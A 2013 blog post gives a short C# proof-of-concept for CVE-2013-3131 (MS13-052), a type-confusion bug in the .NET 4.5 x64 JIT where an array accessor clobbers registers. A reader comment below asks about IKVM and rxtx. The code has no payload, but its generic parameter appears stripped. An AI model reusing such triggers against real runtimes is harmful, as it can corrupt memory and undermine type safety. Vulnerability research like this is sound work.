# Wednesday, 10 July 2013
« Overriding a Final Finalize | Main | Java Method Overriding Is FUBAR Part 7 o... »
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

using System;
using System.Runtime.CompilerServices;

struct Foo {
  byte b1, b2, b3;
}

class U1 { }
class U2 { }

struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;
}

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);
  }

  [MethodImpl(MethodImplOptions.NoInlining)]
  object Get(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    arr.ToString();
    object v = arr[0, 0];
    field2 = field1;
    Console.WriteLine(fields.f3);
    return v;
  }
}

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the array accessor that is generated clobbers the RSI and RDI registers.

Wednesday, 10 July 2013 13:05:47 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
Tuesday, 01 October 2013 11:29:59 (W. Europe Daylight Time, UTC+02:00)
Hi, I try use IKVMC and success convert Java to c#, but I have problems when use rxtx library. " Attempt to get long field "gnu.io.RXTXPort.eis" with illegal data type conversion to int" when try read Input stream from port. Please help me if you can.
nikks
Name
E-mail
Home page

I apologize for the lameness of this, but the comment spam was driving me nuts. In order to be able to post a comment, you need to answer a simple question. Hopefully this question is easy enough not to annoy serious commenters, but hard enough to keep the spammers away.

Anti-Spam Question: What method on java.lang.System returns an object's original hashcode (i.e. the one that would be returned by java.lang.Object.hashCode() if it wasn't overridden)? (case is significant)

Answer:  
Comment (HTML not allowed)  

Live Comment Preview